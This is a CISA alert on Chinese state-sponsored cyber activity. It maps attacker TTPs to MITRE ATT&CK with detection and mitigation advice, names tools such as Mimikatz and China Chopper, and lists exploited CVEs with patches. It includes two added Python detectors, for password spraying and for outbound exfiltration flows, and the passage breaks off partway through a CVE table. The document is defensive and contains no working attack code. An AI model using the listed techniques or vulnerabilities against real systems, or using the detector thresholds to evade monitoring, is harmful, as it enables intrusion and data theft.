### Summary
_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._
_**Note**: on October 20, 2020, the National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) providing information on publicly known vulnerabilities exploited by Chinese state-sponsored cyber actors to target computer networks holding sensitive intellectual property, economic, political, and military information. This Alert has been updated to include information on vulnerabilities exploited by Chinese state-sponsored actors (see Table 4)._
In light of heightened tensions between the United States and China, the Cybersecurity and Infrastructure Security Agency (CISA) is providing specific Chinese government and affiliated cyber threat actor tactics, techniques, and procedures (TTPs) and recommended mitigations to the cybersecurity community to assist in the protection of our Nation’s critical infrastructure. In addition to the recommendations listed in the Mitigations section of this Alert, CISA recommends organizations take the following actions.
1. **Adopt a state of heightened awareness.** Minimize gaps in personnel availability, consistently consume relevant threat intelligence, and update emergency call trees.
2. **Increase organizational vigilance.** Ensure security personnel monitor key internal security capabilities and can identify anomalous behavior. Flag any known Chinese indicators of compromise (IOCs) and TTPs for immediate response.
3. **Confirm reporting processes.** Ensure personnel know how and when to report an incident. The well-being of an organization’s workforce and cyber infrastructure depends on awareness of threat activity. Consider [reporting incidents](<https://us-cert.cisa.gov/report>) to CISA to help serve as part of CISA’s early warning system (see the Contact Information section below).
4. **Exercise organizational incident response plans.** Ensure personnel are familiar with the key steps they need to take during an incident. Do they have the accesses they need? Do they know the processes? Are various data sources logging as expected? Ensure personnel are positioned to act in a calm and unified manner.
### Technical Details
#### China Cyber Threat Profile
China has a history of using national military and economic resources to leverage offensive cyber tactics in pursuing its national interests. The “Made in China 2025” 10-year plan outlines China’s top-level policy priorities.[[1](<https://www.whitehouse.gov/wp-content/uploads/2018/06/FINAL-China-Technology-Report-6.18.18-PDF.pdf>)],[[2](<https://fas.org/sgp/crs/row/IF10964.pdf>)] China may seek to target the following industries deemed critical to U.S. national and economic interests: new energy vehicles, next generation information technology (IT), biotechnology, new materials, aerospace, maritime engineering and high-tech ships, railway, robotics, power equipment, and agricultural machinery.[[3](<https://www.cfr.org/backgrounder/made-china-2025-threat-global-trade>)] China has exercised its increasingly sophisticated capabilities to illegitimately obtain U.S. intellectual property (IP), suppress both social and political perspectives deemed dangerous to China, and harm regional and international opponents.
The U.S. Intelligence Community and various private sector threat intelligence organizations have identified the Chinese People’s Liberation Army (PLA) and Ministry of State Security (MSS) as the driving forces behind Chinese state-sponsored cyberattacks, conducted either through contractors in the Chinese private sector or by the PLA and MSS entities themselves. China continues to engage in espionage-related activities that include theft of sensitive information such as innovation capital, IP, and personally identifiable information (PII). China has demonstrated a willingness to push the boundaries of its activities to secure information critical to advancing its economic prowess and competitive advantage.
#### Chinese Cyber Activity
According to open-source reporting, offensive cyber operations attributed to the Chinese government targeted, and continue to target, a variety of industries and organizations in the United States, including healthcare, financial services, defense industrial base, energy, government facilities, chemical, critical manufacturing (including automotive and aerospace), communications, IT, international trade, education, videogaming, faith-based organizations, and law firms.
Additionally, numerous Department of Justice (DOJ) indictments over several years provide evidence to suggest Chinese threat actors continuously seek to illegally obtain and exfiltrate U.S. IP. Their targets also include western companies with operations inside China.
Public reporting that associates Chinese actors with a range of high-profile attacks and offensive cyber activity includes:
* **February 2013 – Cyber Threat Intelligence Researchers Link Advanced Persistent Threat (APT) 1 to China:** a comprehensive report publicly exposed APT1 as part of China’s military cyber operations and a multi-year effort that exfiltrated IP from roughly 141 companies spanning 20 major industries.[[4](<https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf>)] APT1 established access to the victims’ networks and methodically exfiltrated IP across a large range of industries identified in China’s 12th 5-Year Plan. A year later, the DOJ indicted Chinese cyber threat actors assigned to PLA Unit 61398 for the first time (also highlighted in the report).[[5](<https://www.justice.gov/opa/pr/us-charges-five-chinese-military-hackers-cyber-espionage-against-us-corporations-and-labor>)]
* **April 2017 – Chinese APTs Targeting IP in 12 Countries:** CISA announced Chinese state-backed APTs carried out a multi-year campaign of cyber-enabled IP theft that targeted global technology service providers and their customers. The threat actors leveraged stolen administrative credentials (local and domain) and placed sophisticated malware on critical systems in an effort to steal the IP and sensitive data of companies located in at least 12 countries.[[6](<https://us-cert.cisa.gov/ncas/alerts/TA17-117A>)]
* **December 2018 – Chinese Cyber Threat Actors Indicted for Compromising Managed Service Providers (MSPs):** DOJ indicted two Chinese cyber threat actors believed to be associated with APT10, who targeted MSPs and their large customer base through phishing and spearphishing campaigns aimed at exfiltrating sensitive business data and, possibly, PII.[[7](<https://www.justice.gov/opa/speech/deputy-attorney-general-rod-j-rosenstein-announces-charges-against-chinese-hackers>)] CISA also briefed stakeholders on Chinese APT groups who targeted MSPs and their customers to steal data and further operationalize commercial and economic espionage.[[8](<https://us-cert.cisa.gov/sites/default/files/publications/Chinese-Cyber-Activity-Targeting-Managed-Service-Providers.pdf>)]
* **February 2020 – China’s Military Indicted for 2017 Equifax Hack:** DOJ indicted members of China’s PLA for stealing large amounts of PII and IP. The Chinese cyber threat actors exploited a vulnerability in the company’s dispute resolution website to enter the network, conduct reconnaissance, upload malware, and steal credentials to extract the targeted data. The breach impacted roughly half of all American citizens and stole Equifax’s trade secrets.[[9](<https://www.justice.gov/opa/speech/attorney-general-william-p-barr-announces-indictment-four-members-china-s-military>)]
* **May 2020 – China Targets COVID-19 Research Organizations:** the Federal Bureau of Investigation (FBI) and CISA reported the targeting and compromise of U.S. organizations conducting COVID-19-related research by cyber actors affiliated with China.[[10](<https://www.cisa.gov/news/2020/05/13/fbi-and-cisa-warn-against-chinese-targeting-covid-19-research-organizations>)] Large-scale password spraying campaigns were a commonly observed tactic in illicitly obtaining IP related to vaccines, treatments, and testing from networks and personnel affiliated with COVID-19-related research.[[11](<https://us-cert.cisa.gov/ncas/alerts/AA20126A>)],[[12](<https://us-cert.cisa.gov/ncas/current-activity/2020/08/03/chinese-malicious-cyber-activity%20>)]
#### Common TTPs of Publicly Known Chinese Threat Actors
The section below provides common, publicly known TTPs employed by Chinese threat actors, mapped to the MITRE ATT&CK framework. Where possible, the tables include actions for detection and mitigation. This section is not exhaustive and does not detail all TTPs or detection and mitigation actions.
#### PRE-ATT&CK TTPs
Chinese threat actors commonly use the techniques listed in table 1 to achieve reconnaissance (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/tactics/TA0015/>)]), staging (_Stage Capabilities_ [[TA0026](<https://attack.mitre.org/tactics/TA0026/>)]), and testing (_Test Capabilities_ [[TA0025](<https://attack.mitre.org/tactics/TA0025/>)]) before executing an attack. PRE-ATT&CK techniques can be difficult to detect and mitigate; defenders should nonetheless be aware that these techniques are in use.
_Table 1: Chinese threat actor PRE-ATT&CK techniques_
**Technique** | **Description**
---|---
_Acquire and/or Use 3rd Party Software Services_ [[T1330](<https://attack.mitre.org/techniques/T1330/>)] | Staging and launching attacks from software as a service solutions that cannot be easily tied back to the APT
_Compromise 3rd Party Infrastructure to Support Delivery_ [[T1334](<https://attack.mitre.org/techniques/T1334/>)] | Compromising infrastructure owned by other parties to facilitate attacks (instead of directly purchasing infrastructure)
_Domain Registration Hijacking_ [[T1326](<https://attack.mitre.org/techniques/T1326/>)] | Changing the registration of a domain name without the permission of its original registrant and then using the legitimate domain as a launch point for malicious purposes
_Acquire Open-Source Intelligence (OSINT) Data Sets and Information_ [[T1247](<https://attack.mitre.org/techniques/T1247/>)] | Gathering data and information from publicly available sources, including public-facing websites of the target organization
_Conduct Active Scanning_ [[T1254](<https://attack.mitre.org/techniques/T1254/>)] | Gathering information on target systems by scanning the systems for vulnerabilities. Adversaries are likely using tools such as Shodan to identify vulnerable devices connected to the internet
_Analyze Architecture and Configuration Posture_ [[T1288](<https://attack.mitre.org/techniques/T1288/>)] | Analyzing technical scan results to identify architectural flaws, misconfigurations, or improper security controls in victim networks
_Upload, Install, and Configure Software/Tools_ [[T1362](<https://attack.mitre.org/techniques/T1362>)] | Placing malware on systems illegitimately for use during later stages of an attack to facilitate exploitability and gain remote access
#### Enterprise ATT&CK TTPs
Chinese threat actors often employ publicly known TTPs against enterprise networks. To orchestrate attacks, they use commonly implemented security testing tools and frameworks, such as:
* Cobalt Strike and Beacon
* Mimikatz
* PoisonIvy
* PowerShell Empire
* China Chopper Web Shell
Table 2 lists common, publicly known TTPs used by Chinese threat actors against enterprise networks and provides options for detection and mitigation based on the MITRE ATT&CK framework.
_Table 2: Common Chinese threat actor techniques, detection, and mitigation_
**Technique / Sub-Technique** | **Detection** | **Mitigation**
---|---|---
_Obfuscated Files or Information_ [[T1027](<https://attack.mitre.org/techniques/T1027/>)] |
* Detect obfuscation by analyzing signatures of modified files.
* Flag common syntax used in obfuscation.
|
* Use antivirus/antimalware software to analyze commands after processing.
_Phishing: Spearphishing Attachment_ [[T1566.001](<https://attack.mitre.org/techniques/T1566/001/>)] and _Spearphishing Link_ [[T1566.002](<https://attack.mitre.org/techniques/T1566/002/>)] |
* Use network intrusion detection systems (NIDS) and email gateways to detect suspicious attachments in email entering the network.
* Use detonation chambers to inspect email attachments in isolated environments.
|
* Quarantine suspicious files with antivirus solutions.
* Use network intrusion prevention systems to scan and remove malicious email attachments.
* Train users to identify phishing emails and notify IT.
_System Network Configuration Discovery_ [[T1016](<https://attack.mitre.org/techniques/T1016/>)] |
* Monitor for processes and command-line arguments that could be used by an adversary to gather system and network information.
|
* This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact.
_Command and Scripting Interpreter: Windows Command Shell_ [[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)] |
* Identify normal scripting behavior on the system then monitor processes and command-line arguments for suspicious script execution behavior.
|
* Only permit execution of signed scripts.
* Disable any unused shells or interpreters.
_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/techniques/T1204/002/>)] |
* Monitor execution of command-line arguments for applications (including compression applications) that may be used by an adversary to execute a user interaction.
* Set antivirus software to detect malicious documents and files downloaded and installed on endpoints.
|
* Use execution prevention to prevent the running of executables disguised as other files.
* Train users to identify phishing attacks and other malicious events that may require user interaction.
_Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder_ [[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)] |
* Monitor the start folder for additions and changes.
* Monitor registry for changes to run keys that do not correlate to known patches or software updates.
|
* This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact.
_Command and Scripting Interpreter: PowerShell_ [[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)] |
* Enable PowerShell logging.
* Monitor for changes in PowerShell execution policy as a method of identifying malicious use of PowerShell.
* Monitor for PowerShell execution generally in environments where PowerShell is not typically used.
|
* Set PowerShell execution policy to execute only signed scripts.
* Disable PowerShell if not needed by the system.
* Disable WinRM service to help prevent use of PowerShell for remote execution.
* Restrict PowerShell execution policy to administrators.
_Hijack Execution Flow: DLL Side-Loading_ [[T1574.002](<https://attack.mitre.org/techniques/T1574/002/>)] |
* Track Dynamic Link Library (DLL) metadata, and compare DLLs that are loaded at process execution time against previous executions to detect unusual differences unrelated to patching.
|
* Use the program `sxstrace.exe` to check manifest files for side-loading vulnerabilities in software.
* Update software regularly including patches for DLL side-loading vulnerabilities.
_Ingress Tool Transfer_ [[T1105](<https://attack.mitre.org/techniques/T1105/>)] |
* Monitor for unexpected file creation or file transfers into the network from external systems, which may indicate attackers staging tools in the compromised environment.
* Analyze network traffic for unusual data flows (e.g., a client sending much more data than it receives from a server).
|
* Use network intrusion detection and prevention systems to identify traffic for specific adversary malware or unusual data transfer over protocols such as File Transfer Protocol.
_Remote System Discovery_ [[T1018](<https://attack.mitre.org/techniques/T1018/>)] |
* Monitor processes and command-line arguments for actions that could be taken to gather system and network information.
* In cloud environments, usage of commands and application programming interfaces (APIs) to request information about remote systems combined with additional unexpected commands may be a sign of malicious use.
|
* This technique is difficult to mitigate with preventative controls; organizations should focus on detecting and responding to malicious activity to limit impact.
_Software Deployment Tools_ [[T1072](<https://attack.mitre.org/techniques/T1072/>)] |
* Identify the typical use pattern of third-party deployment software, then monitor for irregular deployment activity.
|
* Isolate critical network systems access using group policies, multi-factor authentication (MFA), and firewalls.
* Patch deployment systems regularly.
* Use unique and limited credentials for access to deployment systems.
_Brute Force: Password Spraying_ [[T1110.003](<https://attack.mitre.org/techniques/T1110/003/>)] |
* Monitor logs for failed authentication attempts to valid accounts.
|
* Use MFA.
* Set account lockout policies after a certain number of failed login attempts.
_Network Service Scanning_ [[T1046](<https://attack.mitre.org/techniques/T1046/>)] |
* Use NIDS to identify scanning activity.
|
* Close unnecessary ports and services.
* Segment network to protect critical servers and devices.
_Email Collection_ [[T1114](<https://attack.mitre.org/techniques/T1114/>)] |
* Monitor processes and command-line arguments for actions that could be taken to gather local email files.
|
* Encrypt sensitive emails.
* Audit auto-forwarding email rules regularly.
* Use MFA for public-facing webmail servers.
_Proxy: External Proxy_ [[T1090.002](<https://attack.mitre.org/techniques/T1090/002/>)] |
* Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server.
|
* Use NIDS and prevention systems to identify traffic for specific adversary malware using network signatures.
_Drive-by Compromise_ [[T1189](<https://attack.mitre.org/techniques/T1189/>)] |
* Use firewalls and proxies to inspect URLs for potentially known-bad domains or parameters.
* Monitor network intrusion detection systems (IDS) to detect malicious scripts, and monitor endpoints for abnormal behavior.
|
* Isolate and sandbox impacted systems and applications to restrict the spread of malware.
* Leverage security applications to identify malicious behavior during exploitation.
* Restrict web-based content through ad-blockers and script blocking extensions.
_Server Software Component: Web Shell_ [[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)] |
* Analyze authentication logs, files, netflow/enclave netflow, and leverage process monitoring to discover anomalous activity.
|
* Patch vulnerabilities in internet facing applications.
* Leverage file integrity monitoring to identify file changes.
* Configure the server to block access to the web-accessible directory following the principle of least privilege.
_Application Layer Protocol: File Transfer Protocols_ [[T1071.002](<https://attack.mitre.org/techniques/T1071/002/>)] and _DNS_ [[T1071.004](<https://attack.mitre.org/techniques/T1071/004/>)] |
* Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).
* Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.
|
* Leverage NIDS and NIPS using network signatures to identify traffic for specific adversary malware.
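The _Brute Force: Password Spraying_ row in Table 2 says to monitor failed authentication attempts against valid accounts. The following Python, added here as an illustration and not part of the CISA alert, shows what that monitoring has to look for: a single source failing against many distinct accounts with few attempts per account, which is the pattern lockout policies do not catch. The log format and all IP addresses and account names are constructed for the example.

```python
"""Detect password spraying (ATT&CK T1110.003) in authentication logs.

Spraying tries one or a few passwords against many accounts, so the signature is
a single source producing failed logons for many *distinct* accounts inside a
short window with only a handful of attempts per account. A classic brute force
looks the opposite: many failures against one account. Account lockout policies
(the mitigation in Table 2) stop the latter, which is exactly why sprayers keep
per-account attempts low.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not taken from the advisory). Each line is a simplified
# export of a logon event: "<ISO time> <source IP> <account> <FAIL|SUCCESS>".
SAMPLE_LOG = """\
2020-05-01T08:00:01 203.0.113.7 alice FAIL
2020-05-01T08:00:04 203.0.113.7 bob FAIL
2020-05-01T08:00:07 203.0.113.7 carol FAIL
2020-05-01T08:00:10 203.0.113.7 dave FAIL
2020-05-01T08:00:13 203.0.113.7 erin FAIL
2020-05-01T08:00:16 203.0.113.7 frank FAIL
2020-05-01T08:00:19 203.0.113.7 grace FAIL
2020-05-01T08:00:22 203.0.113.7 heidi FAIL
2020-05-01T08:41:00 203.0.113.7 dave SUCCESS
2020-05-01T08:05:00 198.51.100.9 admin FAIL
2020-05-01T08:05:02 198.51.100.9 admin FAIL
2020-05-01T08:05:04 198.51.100.9 admin FAIL
2020-05-01T08:05:06 198.51.100.9 admin FAIL
2020-05-01T08:05:08 198.51.100.9 admin FAIL
2020-05-01T08:05:10 198.51.100.9 admin FAIL
2020-05-01T09:00:00 192.0.2.5 alice FAIL
2020-05-01T09:00:20 192.0.2.5 alice SUCCESS
"""


def parse_line(line):
    """Split one log line into (timestamp, source, account, result)."""
    ts, src, user, result = line.split()
    return datetime.fromisoformat(ts), src, user.lower(), result


def detect_spraying(lines, window=timedelta(minutes=30), min_accounts=5, max_per_account=3):
    """Return one finding per source IP whose failed logons, inside some span of
    length `window`, touch at least `min_accounts` distinct accounts while no
    single account is hit more than `max_per_account` times.

    Each finding also lists sprayed accounts that the same source later logged
    into successfully; those are the accounts to treat as compromised first.
    """
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e[0])
    failures = defaultdict(list)   # src -> [(ts, account), ...] in time order
    successes = defaultdict(set)   # src -> {account, ...}
    for ts, src, user, result in events:
        if result == "FAIL":
            failures[src].append((ts, user))
        elif result == "SUCCESS":
            successes[src].add(user)

    findings = []
    for src, fails in failures.items():
        best, span, start = None, None, 0
        for end in range(len(fails)):
            # slide the window start forward until the span is at most `window`
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_account = Counter(user for _, user in fails[start:end + 1])
            if (len(per_account) >= min_accounts
                    and max(per_account.values()) <= max_per_account
                    and (best is None or len(per_account) > len(best))):
                best, span = per_account, (fails[start][0], fails[end][0])
        if best is not None:
            sprayed = sorted(best)
            findings.append({
                "source": src,
                "accounts": sprayed,
                "first_seen": span[0].isoformat(),
                "last_seen": span[1].isoformat(),
                "suspected_compromise": sorted(successes[src] & set(sprayed)),
            })
    return findings


if __name__ == "__main__":
    for f in detect_spraying(SAMPLE_LOG.splitlines()):
        print(f"{f['source']}: {len(f['accounts'])} accounts sprayed "
              f"{f['first_seen']}..{f['last_seen']}; "
              f"successful logons to sprayed accounts: {f['suspected_compromise']}")
```

Grouping by source IP misses a spray spread across the third-party infrastructure described in Table 1; a site-wide variant groups by time window alone and alarms when the number of distinct accounts failing approaches the number of failures.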
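Three rows of Table 2 (Ingress Tool Transfer, External Proxy, and the File Transfer Protocols / DNS application-layer row) give the same detection: look for a client that sends far more data than it receives. The Python below is an added example, not from the alert, that applies that rule to aggregated flow records; the internal address range, the per-port byte thresholds, and every flow record are constructed assumptions for the example.

```python
"""Flag uncommon outbound data flows from flow records: an internal client that
sends far more to an external host than it gets back (the pattern Table 2 lists
for T1105, T1090.002 and T1071.002/T1071.004).
"""
import ipaddress
from collections import defaultdict

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # assumed site address space

# Minimum bytes a source must send to one external destination before the pair
# is reported. udp/53 gets a much lower bar: legitimate resolvers exchange tiny
# queries, so tens of kilobytes outbound to a single resolver is already odd.
MIN_OUT_BYTES = {53: 50_000}
DEFAULT_MIN_OUT_BYTES = 10_000_000
OUT_IN_RATIO = 5.0   # bytes sent must exceed this multiple of bytes received

# Constructed flow records (src, dst, dst_port, bytes_out, bytes_in); not real data.
SAMPLE_FLOWS = (
    [
        ("10.0.0.5", "93.184.216.34", 443, 12_000, 850_000),    # ordinary HTTPS browsing
        ("10.0.0.5", "198.51.100.20", 21, 48_000_000, 120_000),  # bulk FTP upload to an external host
        ("10.0.0.8", "10.0.0.200", 445, 900_000_000, 50_000),    # large copy to an internal file server
    ]
    + [("10.0.0.5", "203.0.113.53", 53, 80, 200)] * 5            # normal DNS lookups
    + [("10.0.0.9", "203.0.113.53", 53, 1_500, 250)] * 40        # many oversized queries to one resolver
)


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def aggregate(records):
    """Sum bytes in both directions per (src, dst, dst_port) so that many small
    flows (the DNS case) are judged as one conversation."""
    totals = defaultdict(lambda: [0, 0, 0])   # -> [bytes_out, bytes_in, flow_count]
    for src, dst, dport, out_b, in_b in records:
        t = totals[(src, dst, dport)]
        t[0] += out_b
        t[1] += in_b
        t[2] += 1
    return totals


def find_outbound_anomalies(records, ratio=OUT_IN_RATIO):
    """Return internal->external conversations whose outbound volume passes the
    per-port minimum and exceeds `ratio` times the inbound volume, largest first."""
    findings = []
    for (src, dst, dport), (out_b, in_b, n) in aggregate(records).items():
        if not is_internal(src) or is_internal(dst):
            continue   # only internal clients talking to external hosts
        if out_b < MIN_OUT_BYTES.get(dport, DEFAULT_MIN_OUT_BYTES):
            continue   # too little data to matter on this port
        if out_b < ratio * max(in_b, 1):
            continue   # roughly symmetric or download-heavy: normal client behaviour
        findings.append({"src": src, "dst": dst, "dport": dport,
                         "bytes_out": out_b, "bytes_in": in_b, "flows": n,
                         "ratio": round(out_b / max(in_b, 1), 1)})
    return sorted(findings, key=lambda f: -f["bytes_out"])


if __name__ == "__main__":
    for f in find_outbound_anomalies(SAMPLE_FLOWS):
        print(f"{f['src']} -> {f['dst']}:{f['dport']}  out={f['bytes_out']} "
              f"in={f['bytes_in']} flows={f['flows']} ratio={f['ratio']}")
```

Thresholds have to be tuned per site: backup agents, cloud sync clients and video calls all send more than they receive, so a production version would carry an allow list of known destinations.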
#### Additional APT Activity
The TTPs listed above have been repeatedly used across the spectrum of Chinese threat actors. The mitigations referenced in this alert can help reduce vulnerability to these TTPs; however, defenders should also maintain heightened awareness of threat actors that are more innovative in their approach, making it difficult to detect and respond to compromise. Publicly reported examples[[13](<https://www.fireeye.com/current-threats/apt-groups.html>)] include:
* **APT3** (known as UPS Team) is known for deploying zero-day attacks that target Internet Explorer, Firefox, and Adobe Flash Player. The group’s custom implants and changing Command and Control (C2) infrastructure make them difficult to track. APT3 exploits use Rivest Cipher 4 (RC4) encryption to communicate and bypass address space layout randomization (ASLR)/Data Execution Prevention (DEP) by using Return Oriented Programming (ROP) chains.[[14](<https://attack.mitre.org/groups/G0022/>)]
* **APT10** (known as MenuPass Group) has established access to victim networks through compromised service providers, making it difficult for network defenders to identify the malicious traffic.
* **APT19** (known as Codoso and Deep Panda) is known for developing custom Rich Text Format (RTF) and macro-enabled Microsoft Office documents for both implants and payloads. The group has backdoored software, such as software serial generators, and makes skilled use of PowerShell for C2 over Hyper Text Transfer Protocol (HTTP)/Hyper Text Transfer Protocol Secure (HTTPS).[[15](<https://attack.mitre.org/groups/G0073/>)]
* **APT40** (known as Leviathan) has targeted external infrastructure with success, including internet-facing routers and virtual private networks.
* **APT41** (known as Double Dragon) has exploited vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central to compromise victims.[[16](<https://attack.mitre.org/groups/G0096/>)]
### Mitigations
#### Recommended Actions
The following list provides actionable technical recommendations for IT security professionals to reduce their organization’s overall vulnerability. These recommendations are not exhaustive; rather, they focus on the actions that will greatly reduce stakeholders’ attack surface.
1. **Patch systems and equipment promptly and diligently.** Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally-facing (i.e., internet) equipment. Certain vulnerabilities—including CVE-2012-0158 in Microsoft products [[17](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)], CVE-2019-19781 in Citrix devices [[18](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)], and CVE-2020-5902 in BIG-IP Traffic Management User Interface [[19](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/04/f5-releases-security-advisory-big-ip-tmui-rce-vulnerability-cve>)]—have presented APTs with prime targets to gain initial access. Chinese APTs often use existing exploit code to target routinely exploited vulnerabilities [[20](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a%20>)], which present an opportunistic attack that requires limited resources. See table 3 for patch information on CVEs that have been routinely exploited by Chinese APTs. See table 4 for patch information on vulnerabilities that the National Security Agency (NSA) has stated are actively used by Chinese state-sponsored cyber actors.
_Table 3: Patch information for vulnerabilities routinely exploited by Chinese APT actors_
**Vulnerability** | **Vulnerable Products** | **Patch Information**
---|---|---
[CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) |
* Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0
|
* [Microsoft Security Bulletin MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027>)
[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) |
* BIG-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)
|
* [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)
[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) |
* Citrix Application Delivery Controller
* Citrix Gateway
* Citrix SDWAN WANOP
|
* [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)
* [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)
* [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)
* [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)
[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) |
* Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15
* Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15
|
* [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)
[CVE-2019-16920](<https://nvd.nist.gov/vuln/detail/CVE-2019-16920>) |
* D-Link products DIR-655C, DIR-866L, DIR-652, DHP-1565, DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825
|
* [D-Link Security Advisory: DAP-1533 Rv Ax, DGL-5500 Rv Ax, DHP-1565 Rv Ax, DIR-130 Rv Ax, DIR-330 Rv Ax, DIR-615 Rv Ix, (non-US) DIR-652 Rv Bx, DIR-655 Rv Cx, DIR-825 Rv Cx, DIR-835 Rv Ax, DIR-855L Rv Ax, (non-US) DIR-862 Rv Ax, DIR-866L Rv Ax :: CVE-2019-16920 :: Unauthenticated Remote Code Execution (RCE) Vulnerability](<https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10124>)
[CVE-2019-16278](<https://nvd.nist.gov/vuln/detail/CVE-2019-16278>) |
* Nostromo 1.9.6 and below
|
* [Nostromo 1.9.6 Directory Traversal/ Remote Command Execution](<https://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html>)
* [Nostromo 1.9.6 Remote Code Execution](<https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html>)
[CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>) |
* Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers
|
* [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)
[CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) |
* Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers
|
* [Cisco Security Advisory: Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)
[CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) |
* Zoho ManageEngine Desktop Central before 10.0.474
|
* [ManageEngine Desktop Central remote code execution vulnerability (CVE-2020-10189)](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>)
_Table 4: Patch information for NSA listed vulnerabilities used by Chinese state-sponsored cyber actors [[21](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>)]_
**Vulnerability** | **Vulnerable Products** | **Patch Information**
---|---|---
[CVE-2020-8193](<https://nvd.nist.gov/vuln/detail/CVE-2020-8193>) |
* Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18
* Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7
|
* [Citrix Security Bulletin CTX276688](<https://support.citrix.com/article/CTX276688>)
[CVE-2020-8195](<https://nvd.nist.gov/vuln/detail/CVE-2020-8195>) |
* Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18
* Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7
|
